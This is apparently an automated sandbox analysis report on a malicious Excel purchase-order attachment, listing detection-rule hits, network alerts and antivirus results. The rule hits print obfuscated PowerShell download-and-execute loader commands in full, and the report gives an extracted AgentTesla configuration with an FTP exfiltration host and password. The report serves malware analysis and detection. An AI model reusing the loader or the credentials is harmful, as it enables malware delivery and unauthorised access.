kYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdl
                      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3640, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3492, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" , ProcessId: 3640, ProcessName: wscript.exe
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3492, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" , ProcessId: 3640, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdl
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3640, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164
                      Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, QueryName: ip-api.com
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wj
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3492, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" , ProcessId: 3640, ProcessName: wscript.exe
                      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3492, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdl
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wj
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3708, TargetFilename: C:\Users\user\AppData\Local\Temp\j4ib2yoe.4gc.ps1
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T08:53:08.847976+020020204231Exploit Kit Activity Detected198.46.178.13480192.168.2.2249168TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T08:52:57.491095+020020490381A Network Trojan was detected142.250.186.97443192.168.2.2249167TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Orden de Compra No. 78986756565344657.xlam.xlsxAvira: detected
                      Source: 10.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.elquijotebanquetes.com", "Username": "mybloddycockcpanel_owner@elquijotebanquetes.com", "Password": "4r@d15PS!-!h"}
                      Source: Orden de Compra No. 78986756565344657.xlam.xlsxReversingLabs: Detection: 71%

                      Exploits

                      barindex
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.46.178.134 Port: 80Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
